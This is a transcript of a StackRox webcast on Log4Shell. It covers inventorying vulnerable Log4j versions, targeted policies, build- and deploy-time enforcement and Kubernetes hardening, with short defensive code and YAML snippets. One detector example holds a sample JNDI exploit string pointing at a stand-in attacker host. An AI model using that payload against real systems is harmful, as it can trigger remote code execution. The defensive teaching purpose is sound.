And welcome back. It's a new year and a new StackRox office hours. We had a little bit of a firework toward the end of the year with Log4Shell, so we figured we'd kick it off with a bang, bring some StackRox experts on, and talk about Log4j, the Log4Shell exploit, Kubernetes, what was different, and a little bit of StackRox news. And joining me I have, to my left, Neil Carpenter, senior principal specialist solutions architect; below me, Eric Bannon, senior specialist solutions architect; and at the angle there, Chris Porter, who's the director of solutions architecture, all at Red Hat, and all of whom came over with me as part of the StackRox acquisition last year. So fellas, thanks for joining me. I guess we're going to kick it off with the hot topic of breaking down Log4Shell, what happened, and a little bit of a timeline for people who might not have been following it. So I'll punt it to whoever wants to pick it up. I can start off, this is Chris. I think everybody's probably heard of this thing already, right? It's the problem that keeps on happening. The initial disclosure, I think, was done rather rapidly, and a lot of people were taken unaware. But this is kind of the worst fear of most security teams: there is a vulnerability in a very, very commonly used Java library. Almost every enterprise Java application out there depends on the Log4j library. It allows an unauthenticated remote attacker to essentially cause remote code execution in your environment. Now, there are a couple of requirements for that. The applications that are exposed have to be writing that data to the log without parsing or sanitizing it. So it's a problem of unsanitized input. If a carefully crafted message submitted to an application, that particular bad string, gets logged through the Log4j library, Log4j performs a JNDI lookup, typically against an attacker-controlled LDAP server, and you can cause arbitrary code execution in the application. So it's really widespread.
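To make the mechanism concrete, here is a minimal sketch, not a real mitigation, of what the trigger string looks like. A vulnerable Log4j version would see a string like `${jndi:ldap://...}` in a logged value and perform the lookup; this toy detector just pattern-matches the un-obfuscated form (real attacks used heavy obfuscation such as nested `${lower:...}` lookups, so matching like this is not a reliable defense):

```python
import re

# Naive, illustrative check for the un-obfuscated JNDI lookup string that
# triggered Log4Shell when logged by a vulnerable Log4j 2.x version.
# Real probes were often obfuscated, so this is NOT a usable mitigation.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell_probe(log_line: str) -> bool:
    """Return True if the line contains a plain JNDI lookup string."""
    return bool(JNDI_PATTERN.search(log_line))

print(looks_like_log4shell_probe(
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example.com/a}"))  # True
print(looks_like_log4shell_probe("GET /health HTTP/1.1"))                 # False
```

The point of the sketch is just to show why any logged, attacker-controlled field (a User-Agent header, a chat message) was a viable delivery vehicle.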
It's really easy for an attacker to exploit. And the result gives the attacker a substantial amount of freedom inside the application. So this gets that 10.0 on the CVSS scale of 1 to 10. It's kind of the worst nightmare. I've seen it labeled as the worst security vulnerability ever. We've seen a lot of organizations scrambling to find out where they're impacted by this. The other challenge with it has been that, over the course of a couple of weeks, the mitigation for this has been a little bit muddled. The initial exploit came out and there was an immediate fix. There were some recommendations around changing the configuration, environment variables you could set to mitigate this, that turned out to be incomplete or ineffective at mitigating the problem. I think what happened is that security researchers turned their eye to this library after the initial discovery, and so there were a couple of additional discoveries. The authority on all of this, of course, is the Apache Log4j security page, where you can look at the various vulnerabilities. But we're not talking about a single vulnerability here; it's a series of them that ended up being arbitrary code execution or denial of service, a bunch of problems. Who knows if we're done yet? But the fact that it keeps on popping up is today's topic. So I thought we would talk a little bit about OpenShift and Kubernetes today and how organizations can discover vulnerable versions of this and tackle it using something like StackRox. We want to talk a little bit about how the process should work, because organizations that found themselves blindsided here really should use the opportunity, in my opinion, to establish more of a permanent process, because this isn't going to be the last one, right? There's no way that the world is done with vulnerabilities in commonly used libraries.
And so setting up a process, the crisis here, drives an opportunity for us to help customers and users improve the situation going forward. And, you know, Chris, one of the things I really love about this vulnerability, to the extent you can love something about a vulnerability, is how it was applied. The first compromise I'm aware of that used this was somebody attacking users of Minecraft, the game, which is all Java based. And what was happening was this vulnerability is so flexible that by sending a single message in chat, apparently, they were able to compromise both the Minecraft server and everybody connected to that server, right? An incredibly powerful vulnerability that has since been used in a lot of different places for a lot of different things. But it really drives home how foundational this particular issue is and why everybody's been so concerned about it. You touched on a little bit of the challenges with the update, right? Because there was an initial patch and there was a belief that that was the fix, and it also had a slight misconfiguration, let's say. And one of the reasons why I want to talk about OpenShift and Kubernetes specifically is you do need some sort of process where, okay, we had a misstep or something's gone wrong: what's the quickest way we can get updated? And then can we verify that we've done all those upgrades, that the right versions are in there, and that we've made the configuration changes? So I was hoping you could talk a little bit about how we can use Kubernetes to, let's say, make that fixing process a little bit easier and identify those vulnerabilities a little bit quicker. Yeah, maybe instead of just talking about it, I could show you some of this. And I will preface this by saying that none of what's running in the lab environment I have up is available from the internet, because I'm going to show you that I have some vulnerable things running here, but you can't get to any of it.
So I've got OpenShift up and running in this environment. As a matter of fact, I've got both OpenShift and Azure AKS in this particular environment, but we're going to focus on the OpenShift side of it for today. And I've also got Advanced Cluster Security, the Red Hat version of StackRox, up and running. And this is really, I think, a great starting point to give us visibility into what's deployed, what's running, what the state of it is, what components are in there, and what's vulnerable, which is all the stuff we want in order to get to where Mr. Foster was pointing us. And so let's dive in here. We have a very specific example with Log4Shell, with CVE-2021-44228 and the vulnerabilities that followed it. But this is also a really common scenario going back 15 years or more in my career: hey, I just saw this vulnerability in the news, I just saw reports about this, the FBI just called us and warned us about something. How do we go look and see if this is a problem for us? And sometimes you're starting even without a CVE; you're starting with a report that says a particular component at a particular version may have a problem. And so it's important not only to be able to go look at your vulnerabilities, but, if we take a step back from that, we may have started early in this and said, hey, I'm reading something about this Log4j component. How are we using that? Where are we using that? And so in ACS, I can dive through all the components currently in use in the images backing my deployments. I can see here a list of all of the components across everything, and I can pretty easily filter this down to look for Log4j. There we have it. And I can see I have a number of different versions of Log4j currently running in my environment.
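The inventory filtering described here happens in the ACS UI or API, but the shape of the question is simple enough to sketch. This is a toy version with made-up image names and data, just to show the filter logic: find every occurrence of a component, then narrow to the ones backing running deployments.

```python
# Made-up component inventory, standing in for what an image scanner
# reports across a cluster; this is an illustration, not the ACS API.
inventory = [
    {"image": "registry.example.com/app-a:1.0", "component": "log4j", "version": "2.14.1", "in_use": True},
    {"image": "registry.example.com/app-b:2.3", "component": "log4j", "version": "2.11.1", "in_use": True},
    {"image": "registry.example.com/old:0.9",   "component": "log4j", "version": "2.6.2",  "in_use": False},
    {"image": "registry.example.com/web:5.1",   "component": "nginx", "version": "1.21.4", "in_use": True},
]

# Step 1: everywhere the component appears, including unused images.
log4j_hits = [c for c in inventory if c["component"] == "log4j"]
# Step 2: narrow to images actually backing running deployments.
active_hits = [c for c in log4j_hits if c["in_use"]]

print(f"{len(log4j_hits)} log4j components found, {len(active_hits)} in running deployments")
```

That two-step narrowing, everything present versus actually in use, is exactly the distinction the demo draws between stored images and live deployments.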
And so in the initial vulnerability, CVE-2021-44228, everything 2.14 and below was vulnerable, if I remember right, don't quote me on that, but 1.x was not. So I could easily come in here and go, well, I've got a 2.6.2, a couple of 2.11s, and a couple of 2.14s. All of those appear to be vulnerable. So this is a starting point for me before we even get to the vulnerability. It's about being able to look at that makeup, that inventory of what we're running, and understand what's going on and where. So I can see, for example, that I've got a bunch of images that are not actually in use in my environment today, but this 2.11.1 is in use in two deployments. And I can go look at what those deployments are. There are some outdated versions of SonarQube I'm still running in this lab just to have something to show off. But I can go dig into and find those things and get to them. Now, from there, once I have a CVE to look at, I can flip that around and search the inventory by vulnerability. So I can type in the CVE, if I type it in right, and go see what we have that's actually failing on that vulnerability. And I can see I've got two deployments, seven images, five components. I can dig into it and, once again, see the specific versions that are vulnerable to that and the deployments they're running in. So now this is starting to get me to a place where, in late December, when everybody was trying to figure out what was going on and what the extent of their exposure was, this is starting to give me that information. So I can take this inventory, dive into what's deployed, what's running in my environment, and say, all right, here's where I actually have a problem with this.
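Neil's recollection is right: for the initial CVE-2021-44228, Log4j 2.x up through 2.14.1 was affected, 2.15.0 was the first fix, and the 1.x line was not affected by this particular CVE (it has other, older issues). A rough version check, simplified to major.minor and ignoring pre-release suffixes, looks like this:

```python
def vulnerable_to_cve_2021_44228(version: str) -> bool:
    """Rough check for the initial Log4Shell CVE only: Log4j 2.x below
    2.15.0 was affected; 1.x was not. Simplified to major.minor and
    ignoring -beta/-rc suffixes, so don't use this as a real scanner."""
    parts = version.split(".")
    major = int(parts[0])
    minor = int(parts[1].split("-")[0])
    return major == 2 and minor < 15

# The versions from the demo environment:
for v in ["1.2.17", "2.6.2", "2.11.1", "2.14.1", "2.17.0"]:
    print(v, vulnerable_to_cve_2021_44228(v))
```

Note this covers only the first CVE; the follow-on CVEs (2.16.0, 2.17.0, 2.17.1 fixes) each have their own affected ranges, which is exactly why relying on a scanner's curated vulnerability data beats hand-rolled version math.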
And this is something I think Chris, Eric, and I all talked to a number of customers about in late December and into January: how do we start with this inventory? How do we figure out what's already deployed? One of the issues with Log4j is it's such a ubiquitous component, so common in Java applications, that nobody really knew everywhere it was being used. Upstream vendors had used it to log data. Off-the-shelf software had used it. Lots of people had used it. So nobody really had a good understanding, around the third week of December, of where they were impacted and what was impacted. So this gets us there, right? We can go look at what's currently deployed. So here, we've got a problem. Now, from here, there are a couple of things we can do that I think are of interest. If we've got our arms around where we are today, the next thing is we want to start creating policy to catch this particular problem. In ACS, we have some generic policies that are going to catch all of our vulnerabilities, but that's a fair amount of data and a fair amount of work that customers typically do with that. If we have a particular emerging set of circumstances like Log4Shell, we may want to create a targeted policy that looks for that. And in this case, we actually, on the engineering side, created one, and that is here. So we created a default policy to look for this, but in other cases I could create a policy that says, you know, CVE-2022-1234 is particularly interesting for some reason. I can create a policy that says, let's go look for this vulnerability, start generating alerts, potentially turn on enforcement, and say, you know what, this is critical enough that we're not going to allow you to deploy something that has this vulnerability in it. And in this particular case, this policy is really simple. We're looking for CVE-2021-44228, and we have some information here about it. And so we can find it.
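The targeted-policy idea reduces to a small amount of data and logic. Here's a hypothetical sketch (the policy name and deployment data are invented; this is not ACS's actual policy format): a policy that matches a single CVE and carries a flag saying whether to merely alert or also block at deploy time.

```python
# Hypothetical targeted policy: match one CVE, optionally enforce.
policy = {
    "name": "Log4Shell: log4j RCE",
    "cve": "CVE-2021-44228",
    "severity": "CRITICAL",
    "enforce_at_deploy": True,
}

def evaluate(policy, deployment):
    """Return (violated, blocked) given a deployment's list of CVE IDs."""
    violated = policy["cve"] in deployment["cves"]
    blocked = violated and policy["enforce_at_deploy"]
    return violated, blocked

dep = {"name": "sonarqube", "cves": ["CVE-2021-44228", "CVE-2021-45046"]}
print(evaluate(policy, dep))  # (True, True): alert fires and deploy is blocked
```

Flipping `enforce_at_deploy` to `False` is the "alert only" mode discussed here, which is why the same policy definition can serve both the notification stage and, once teams are ready, the enforcement stage.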
And we can go look in our violations and say, show me any violations of that policy. And I can see where my deployments have run up against that. I could turn on notifications and start sending these out, so if somebody tries to deploy something, we get an email or a Slack message or however we want to be notified. And like I said earlier, I could turn on enforcement, take that a step further, and start blocking anything with this vulnerability in it from getting deployed. That's starting to get my arms around this issue. But ultimately, what I'd like to do is shift left. We've all talked about that for years now. I'd really like to start catching this before somebody ever tries to deploy it. And so not only can I enforce this at deploy time, but I can move it back to build time: start looking at what I'm building, start scanning, start returning results, and start applying these policies at build time. Same policy, same criteria. I don't have to go create different policies to do this. And so I've got OpenShift Pipelines up and running, and I've got an image that I borrowed just to show you this. I can see, as part of my scan there, that we caught not just our general vulnerability policy, and this image has a number of vulnerabilities in it, but specifically this Log4Shell policy that we created. And so I can see that being caught there. Now I've taken that security concern all the way left to where I'm building or ingesting images, and I'm able to catch it there. I actually wasn't enforcing this, but I'm able to start breaking builds so that you have to fix this vulnerability, you have to fix this problem, before you can ship it and before it can ever be deployed in your environment.
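Mechanically, "breaking the build" usually comes down to a pipeline step exiting non-zero when the scan reports an enforced policy violation. This is a sketch of that gate, not the actual ACS or OpenShift Pipelines integration; the `scan_results` structure here is invented to stand in for whatever your scanner returns:

```python
# Sketch of a build-time gate: a CI step that fails (non-zero exit code)
# when the image scan violates any policy configured to enforce at build.
def gate(scan_results):
    """Return the exit code a CI step would use: 1 blocks the build."""
    enforced = [r for r in scan_results if r["enforced"]]
    for r in enforced:
        print(f"BUILD BLOCKED by policy: {r['policy']}")
    return 1 if enforced else 0

scan_results = [
    {"policy": "Log4Shell: log4j RCE (CVE-2021-44228)", "enforced": True},
    {"policy": "Fixable CVSS >= 7", "enforced": False},  # alert only
]
exit_code = gate(scan_results)  # a real pipeline step would sys.exit(exit_code)
print("exit code:", exit_code)
```

Because the gate is driven by the same policy data used at deploy time, "same policy, same criteria" falls out naturally: the pipeline just asks the same question earlier.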
And having that flexibility, I think, is where I'd say the money's made, because you don't really want to be just forcing decisions on developers. Maybe, if something's not getting pushed to production right away, you're giving them a little bit of time, saying, hey, if you don't fix this within two more builds, we're going to basically flip the policy to enforce, or something like that. It's the awareness side. And then going into the tools that the developer is already going to be using and looking at, I think, is where the value is, right? Yeah. And for me, there are some big things there. First of all, the flexibility of a policy-based approach lets you start defining: what am I interested in? What do I want to see? And then, further on, what do I actually want to enforce? Where do I want gates that I'm not going to allow things to get past? And then defining those things and applying them flexibly across that whole pipeline, from build time to deploy time and then into runtime. And realistically, you're probably going to have five, six, seven teams, all with different types of gates and different applications set up, too, right? So you're going to need some flexibility, because some teams use different CI and build tools, so that all needs to be adjusted too, right? And some teams will be front-end and others data science; maybe it's less impact, right? Absolutely. Yeah. I mean, I'd like to think the best of my development teams, right? If I'm a security director, I've got to assume that they want to fix these things. They don't want to be on the big board for being a huge risk here, right? What I like about this policy-based approach is: hey, it's present in your build; you do what you need to do to fix it. It could be updating the version of it.
Maybe this is something that's not easy to do with Log4j, but with a lot of other components, you find a vulnerability in something that you're really not even using, right? If it's not a critical part of your application, just take it out. It came with your Docker base image; it came with some other install that you did. Maybe you weren't aware of it. There are a lot of reasons why the resolution here is left in the hands of the developer, because instead of fixing a vulnerability by updating to a properly fixed version of that library, another option is to remove that dependency. If you don't have it there, you don't have to maintain it. As a security director, I don't care one way or the other. I just don't want the vulnerable version present in your application, and whatever way you want to resolve that is fine with me, as long as that condition gets met. And that's really what the policy is saying here. Yeah. And just from a couple of customer examples: I think the first thing everybody wanted to do, which Neil was showing at the beginning of the demo, was just to know, okay, am I exposed to this vulnerability? Do I have it running in a deployment? And I had a couple of customers come to me and go, okay, I've done that a couple of times. I was able to use the information in ACS to hand something to a developer and say, yeah, fix this. And they were able to move the needle on that. The next question logically becomes, okay, how do I remove myself from that feedback loop so that I have an automated control in place to tell developers about those things? And I think it gets really interesting there.
You know, now you have this automated notify-and-inform stage where you're not just exporting data and handing them a list, but you're really getting it to them in the place where they're building the application. And I also think there's an opportunity there for security teams to put their own spin on the policies, right? As it relates to this vulnerability, they might have certain mitigations in place, and they want to add an extension to that policy that captures, okay, this is something that's vulnerable, but we also want to capture X, Y, and Z, or we want to put a preference on these namespaces. And so I think there's a lot of automated control we give the security team, right? To be able to put that in a policy and remove themselves from constantly inventorying things and manually doing a lot of that stuff. Yes, that's a great mitigation for one of the worst problems in security, which is: I fixed it all today, we fixed all of the applications, and then tomorrow somebody changes a dependency, brings in a vendor-supplied image, and boom, the thing is back, right? And so once the attention drops from that manual review process, they find that old vulnerabilities resurface. We love giving developers the flexibility to do what they want, to experiment with different packages, to go out and try that new software component. But then we find out it still has dependencies on these old versions. A policy, though, is not going to forget, right? It's not going to forget that you brought in this library and it still has that vulnerable version in it. So what I think we're talking about here is not just Log4j; it's honestly any vulnerability. It's having a process in place.
And we have customers who had such a process in place, and they had a lot less to worry about when this thing was released. They knew that nobody could push a build, nobody could promote anything to a running environment if this thing was present, just because the policy was already in place and the dev teams were used to reacting to that. So the policy, the process, is really where the security is here. And I think it also moves the needle on the enforcement conversation in these organizations, right? These are kind of blessings in disguise, almost, where security is able to take a bit of a leap forward in that conversation around: we can have something that we turn on. Because this is one of those perfect examples where turning on the deploy-time policy that Neil showed is actually a pretty suitable option for production environments, right? Actually denying a deployment, and obviously, within a given implementation, you want to be careful about how you do that. But the fact, like you said, Chris, that we have that enforcement story is powerful, because there are a lot of tools that can scan for this vulnerability. There's a lot of vulnerability assessment technology and scanning tools that can give an idea of where it's inventoried. But there aren't a lot of ways of doing that native enforcement in a way that moves the needle for security to say, okay, yeah, we can draw a hard line here, we can turn this on and prevent this. And I'm more interested to see how that's going to help them with other things they're trying to do organizationally, right?
If you have success with something this critical, can you begin to turn on additional policies that have nothing to do with Log4j? Because you've built that confidence in security, you're able to kind of move the needle on it. And Chris brought up one of the things that I think is a really interesting move in Kubernetes and containerized applications. A year ago, two years ago, when we talked about CI, everything was built internally for the most part, especially when we talked to enterprises. Everything was focused on what my developers are doing, what my developers are delivering. And what's happened is we're starting to see vendors and external organizations deliver software as container images, as Helm charts, as operators, whether it's the 5G providers in telecom or IBM Cloud Paks. Chris and Eric, I think I told you guys, I installed TrueNAS SCALE the other day, building a network-attached storage device in my house. It has Kubernetes built into the platform to deliver applications; they've got a catalog of Helm charts that deploy on top of that. This sort of consumerization of containers means that security teams have to think about that as well, right? Not just how we're scanning the things our developers are building, but how we're scanning the Cloud Paks we're getting from IBM, or the container images we're getting from Ericsson, or the things external vendors are delivering to us to run on top of OpenShift, on top of EKS, or wherever we're running. Just because it's supplied by an external vendor doesn't mean your security policies don't apply. And I think this is a really great example of where, because Log4j is so ubiquitous, it's been important to be able to go as early as possible to scan those externally supplied container images as well and understand what the inventory is there, what you're running that somebody else has handed to you.
Neil, you've been doing threat hunting and incident response for a long time, right? The container format seems to me, with Kubernetes, a little bit more prescribed, right? We've got some limits around it. I've got a pipeline; I can establish a process. Is it easier, then, in this environment to track this sort of thing down if I've got limits on where I get my images from and I force them to go through a process? It seems like security teams should be advocating for the move to containers, because they've got that control, that visibility, and almost a library of assets here. Yeah, I think once you figure it out from a security perspective, it's much easier to manage it and control it, to know what's deployed and what it's doing, and to take appropriate action to contain it. Now, I think we've all been there, right? Knowing how to do it is the first big hurdle, because it's a huge change for a lot of security professionals, from traditional VMs and bare metal to containers, and what that change means to them. But I think the organizations we work with who have gotten past the learning phase and really dug in and started doing it are really automating security in interesting ways. I know you mentioned one of my favorite customers, who is still in the middle of a move from monolithic on-prem data center applications to turning those into microservices, containerizing them, and then deploying them on top of Kubernetes to run their business. It's a huge shift and a huge investment, and they had some really smart security people early on who built out an idea of what this was going to look like. So we worked with them, and they deployed day one with enforcement turned on at both build time and deploy time for their most important, critical applications and their most serious security policies.
Out of the gate, they had controls where they could say, you can't pass here if you don't pass these checks. That's really reducing the attack surface and starting to control what's there and have visibility into it. Half the battle is having the conversation between developers and security teams, and when you have that sort of baseline of, hey, this is hardened, this is what we're willing to accept, and we're willing to give leeway if you can make a specific case, well, then you can have people coming to the table and having that conversation. It makes security a little bit more fun, I'll say. It's a lot of doom and gloom when stuff like Log4Shell comes out. Another point I'd put out there for Kubernetes is the speed at which you can build a container and go deploy it, using something like Argo Rollouts or other Kubernetes-native approaches to push something out. There is some, I don't want to say safety in it, but the speed at which you can go and patch something, I hope security teams can see the advantage of that. I don't want to trivialize that. It's not easy for organizations to make a shift if they're used to building weekly, monthly, or quarterly, with releases going out in a big way rather than as a continual process. But when they make that change, and their developers get used to the idea that there's a new build every day, every hour, that every pull request creates a build, then every one of those builds is an opportunity to pull in the latest versions and get those fixes in. That allows them to react to any of these. We'll keep saying this, but this is not the last of these. I'm not even sure that we're done with Log4j yet. There are going to be more of these things that security researchers find, and you want to be able to quickly go out and take advantage of those fixes as soon as you possibly can.
Developers are better off when their dependencies are explicitly defined in something like a Dockerfile, and they can just rerun that build again and again. It's one of the better things about this format. You're right, too; we said earlier, Michael, that we call it the common language between security and developers. They haven't had a whole lot to talk about in common, but when we use Kubernetes as the language of discussion here, about deployments and images and defense in depth, in that terminology, both sides can understand it. It starts the conversation and gets each team thinking about what the other team is concerned about. And if we break up the roles here, defining the security goals and then handing implementation to the right authorities, you'll get fewer of the developer headaches. Developers have a headache with security tools that just enforce: they don't provide information, they just break things, and that violates the principle of wanting to specify everything in code. Of course, the security teams know that if you let developers do whatever they want, they don't prioritize security fixes. That's natural; you prioritize new features and fixing bugs and things like that. We're slowly grinding out the team collaboration here to get them to think about all these things together, because they are actually heading toward the same goal: deliver applications better and faster, but more securely at the same time. We talked a little bit about policy, well, a lot about policy, and about Log4j. I'm curious, are there any sorts of things people could be doing beforehand that you could maybe show us? Obviously, there's a little bit of configuration in Kubernetes, just a little bit. And obviously, these things are going to happen again.
What are some practical policies, some best practices, just great habits that people can get into, so that when this does happen, they can, one, find those things really quickly, and two, make sure the impact is very low, even if something was able to sit in the cluster for a couple of days? I think it was five days from the Minecraft disclosure until NIST released it as an actual, widely acknowledged vulnerability; there's some lag there. I'll start there. I often say that when you move to containers and Kubernetes and OpenShift, to some extent your security problems don't change, and at the same time, everything changes. A lot of the approaches are the same ones we've been talking about for years. Can I reduce the blast radius of a particular compromise? I sort of have to accept that at some point there are going to be zero-day vulnerabilities. There are going to be vulnerabilities I couldn't patch for some reason. There is going to be some set of things that results in something in my environment getting compromised. We used to call it, or I guess we still call it, an assume-breach mindset. If I start there, the next thing I can do is make it so that if any particular piece of my application or environment gets compromised, I can limit what an attacker can do with it. One of the examples I think works really well in Kubernetes and OpenShift, once you start getting your mind around it and figure out the right approach, is network policies: applying essentially microservice-level firewalling down to the container level that says the only thing this container can talk to is this other container that it always talks to, and it can't talk to anything outside of that pattern. And now you've locked an attacker into that. They can't compromise one container and then use it to jump to other significant pieces of the environment.
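The "only talk to what you always talk to" pattern maps directly onto a Kubernetes NetworkPolicy. As a sketch, here is a minimal manifest built as a Python dict (the `shop`, `payments`, and `frontend` names are hypothetical; the field names follow the Kubernetes `networking.k8s.io/v1` API) that allows ingress to the payments pods only from the frontend pods:

```python
import json

# Minimal NetworkPolicy: once any policy selects the "payments" pods,
# all other ingress to them is denied by default, so this allowlists
# exactly one caller. Namespace and labels here are made up.
network_policy = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "NetworkPolicy",
    "metadata": {"name": "payments-allow-frontend", "namespace": "shop"},
    "spec": {
        "podSelector": {"matchLabels": {"app": "payments"}},
        "policyTypes": ["Ingress"],
        "ingress": [
            {"from": [{"podSelector": {"matchLabels": {"app": "frontend"}}}]}
        ],
    },
}

print(json.dumps(network_policy, indent=2))
```

Applied with `kubectl apply`, a policy shaped like this is what turns a compromised container from a pivot point into a dead end, which is the blast-radius argument being made here.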
That sort of thing is an incredibly powerful tool and a great place, maybe not to start, but once you start getting your arms around this, to dig into and figure out: how do we do that? How do we reduce the blast radius, the impact of any particular container being compromised, and lock them down? Yeah. You mentioned those configurations, Michael, and they're complicated. And unfortunately, as you've seen from some of the StackRox material previously, there are quite a few configurations in Docker images and in Kubernetes where the default is wide open, right? The network policies Neil was talking about are one of those. There is no restriction on container networking within a cluster, for ingress or egress, unless you go and change that. Things like being able to write to the file system or running as the root user are all defaults because they're really useful for getting up and running and being productive with your application. But they're also super useful for an attacker. And so we see, again and again, organizations running these big, fat container images, base images that were intended for a virtual machine at one point. They have loads of tools on them that are useful for maintaining and updating a virtual machine. They have your standard Linux file system on there. They have handy utilities like curl and open access to the internet. And so now an attacker who's able to run arbitrary commands can go pull down a cryptominer from GitHub and start running it. We see that it isn't even just an attempt to steal data or establish backdoors in the environment; it's free resources. If I can run my workload on your infrastructure, I'm making money off your back. And if you haven't detected that activity, then you're potentially going to be faced with a big cloud bill, and you're going to have this problem in your midst that you weren't even aware of. Some of these attacks are pretty easy, frankly, to defeat.
They're pretty naive attacks. Just throw enough of these arbitrary commands out there to see what sticks. And enough of it sticks to make it worthwhile. So there's a ton of those things. I'd just like to think about it this way: containerized applications are not VMs. They're not general purpose, and they represent a kind of constrained runtime. You get similar benefits to things like serverless, which is another topic. But when you can't run a general-purpose workload, if it's built around a particular microservice, a particular batch job, or whatever, you should use that to your advantage to constrain what an attacker can do. They might compromise it. Like Neil said, you have to expect that there are other zero days present in your application right now, and you should plan on that being a reality. So let's not give them any surface area. Of course, too, developers need to be careful about the kind of input they accept and sanitize it, but that's a different topic. That's a source code practice and secure coding topic. But all these things contribute. The more painful we can make it for an attacker to do anything useful, the better shape you're going to be in. I think the things you mentioned, Chris and Neil, are good starting points too. When people ask, okay, what can I focus on when it comes to risk, or when it comes to things I might be able to enforce sooner rather than later? There's a handful of the right types of configurations and risks that any customer should care about. There's obviously the unique stuff that might vary depending on how a customer is running their specific environment. But in general, you don't want to be running as privileged. In general, you don't want to be running as root. You don't want to be running with these overly permissive configurations.
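Those permissive defaults (root user, writable filesystem, privilege escalation) can all be overridden per container. A sketch of a locked-down security context; the pod name and image are hypothetical:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: example-app                        # hypothetical workload name
spec:
  containers:
    - name: app
      image: registry.example.com/app:1.0  # hypothetical image
      securityContext:
        runAsNonRoot: true                 # refuse to start if the image would run as UID 0
        privileged: false
        allowPrivilegeEscalation: false    # block setuid binaries and similar tricks
        readOnlyRootFilesystem: true       # an attacker can't drop a crypto miner onto disk
        capabilities:
          drop: ["ALL"]                    # shed Linux capabilities the app doesn't need
```

None of this stops a vulnerable library from being exploited, but it strips away most of what an attacker can do with arbitrary code execution once they're in.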
I think a lot of that's just customers getting educated on what the right way is to do security on Kubernetes right now, to your point, transitioning from VMs to containers. But what we've always seen is that when we give customers those handful of policies or those handful of things they can do, it's pretty great. Then you look at the customers that Neil mentioned, where they get down the path of adopting some of those things, between the developers and some of those processes being in place, they're able to actually take advantage of enforcement eventually and do some of those things. But yeah, I think it's a really good opportunity to not focus on everything that you could possibly prevent. There's a handful of really low-hanging fruit: start here, get these things done, get adoption of the mindset that this is the way we want to run containers as best practice. And also, who is in charge of what? Because I think one of the largest issues with Kubernetes is you have a developer who might just do the build for the container, and they don't set up the configuration, and then, okay, well, does the operations team know exactly what's going on in the container? And now, okay, if you give them a UI that shows them the normal traffic in the test environment, for example, then we can mold a network policy and test it. But that communication can be really annoying, especially as you try to grow Kubernetes and grow your team and expand, and maybe you lose a developer. So just having that wealth of information, I think, was one of the largest hurdles early in Kubernetes. I think it's been somewhat solved, although developers might say different. But yeah, I was kind of curious: how do you bridge that gap, and what specific actions and tools do you look for to help with that communication, especially around network policy?
I think that is one of the, let's say, once you get to scale and you start looking at hundreds of network policies, thousands of network policies, right? How do you visualize that? How do you keep that all organized? Toss-up? Well, it's a tough challenge when organizations are coming at it the way most of these platforms get rolled out. So Kubernetes is in use, and security is trying to come in after the fact, right? Developers are racing a million miles an hour to get to these platforms. It's super easy to provision these clusters and, you know, to repurpose bare metal or VMs for Kubernetes now, and the security team is forced to come in afterward. I mean, it's like tackling anything, right? As with cloud 10 years ago, you've got to carve off little manageable bits. You've got to be willing to make exceptions and understand where there are business priorities, right? We talk about risk a lot at StackRox, and security organizations want to reduce that risk, but sometimes there's, you know, a need, right? Certain things need to be exposed in a way that makes them useful, and application teams need to understand what some of that risk is and be willing to accept it. So I actually have a tough time answering this question about where to get started except when the customer has some goal like, hey, we have to be PCI compliant, or we want to follow this standard. It's great to have a set of marching orders, because then I can go and point out: hey, PCI talks specifically about some of the networking stuff that Neil was addressing, right? And minimization of privileges is, frankly, a bog-standard part of every compliance benchmark out there. So when the customer has a goal like that, generally prioritization is the way to go. Some applications are the crown jewels.
Some applications are, frankly, things we need to run, but they're not super critical, right? So if organizations have a means of identifying that and specifying how that works, Kubernetes gives us a little bit of help with being able to use metadata, like a namespace, like labels and annotations. Make use of those standards to express something about the priority of a workload. It'll help everybody: operations and development and others. It'll help security teams make a decision about exceptions to those policies. So in general, the way to approach this, I think, is lots of tools, lots of visibility; there's tons of stuff. I would start with the crown jewels, right? I want to identify a particular namespace that has this super important client data in it, or, you know, sensitive regulatory data or whatever it might be. And that's where we start to apply the scrutiny and start to enforce things: you know, notifications and warnings, followed by enforcement. One of the things that we've seen is a tendency for organizations to treat production really differently security-wise from development and UAT, right? Development environments are usually these sandboxes that are kind of throwaway; they're a mess. But we know that attackers find them just as valuable as your production applications, right? Maybe even more so. So I'm starting to get away from saying, you know, hey, you could warn somebody about this in development but let them run whatever they want. Because if I want to run a crypto miner on your infrastructure, that huge development cluster you have is really appealing to me, right? Maybe there are fewer limits in that Amazon account or that Azure account, and I can scale up my workload to mine whatever the trendy coin of the week is.
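The namespace metadata mentioned above is just ordinary Kubernetes labels. A sketch of tagging a crown-jewel namespace; the namespace name and label keys are hypothetical conventions your teams and security tooling would have to agree on:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: client-data                      # hypothetical crown-jewel namespace
  labels:
    data-classification: regulated       # hypothetical convention for sensitive data
    criticality: high                    # used by security tooling to prioritize policy enforcement
```

For an existing namespace, `kubectl label namespace client-data criticality=high` achieves the same thing, and policies, alert routing, and enforcement decisions can then key off that label.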
So I think having that kind of scrutiny, you quickly need to move from thinking about one production application to basically an organization-wide policy. There's a couple of steps you can take in there, but you need to get to that organization-wide strategy. So, you know, Michael, there are two other things that occurred to me from both of your last two questions. Wargame this stuff, right? Don't wait until Log4Shell 2.0 comes out to figure out where all of this information is, who owns which pieces of it, who needs to do what, how you quickly resolve a vulnerability and ship a new image. Go do that stuff today. You know, it's January, everybody's probably a little slow, but periodically work through these sorts of situations. And I think the other thing that goes along with that is: know your outside resources, your vendors, and other people who can help, right? So if you're running OpenShift and ACS, StackRox, and you're using Red Hat UBI images, know how to get in touch with us or whoever your vendors in those spaces are. So if you're trying to figure out how to go find these things, or where you find a fix for this or whatever else, you know how to do that and you know where the right pieces are. Get ahead of it. Yeah, and you can always come and spam us in the chat if you want to get in touch. It's an easy one. But yeah, you're 100% right. And the wargame thing is interesting, because I always find security is this huge fear. It's like a flurry of fires, right? We're just putting them out after the fact. But I think it could be fun if you set something up like that. It's like, okay, let's see how much we can automate, and then go take a break for a second, so that when the fire does come, it's just a little kitchen fire or whatever. We'll make a little change and we can move on. That's the way I picture security, whether or not that actually happens in real life.
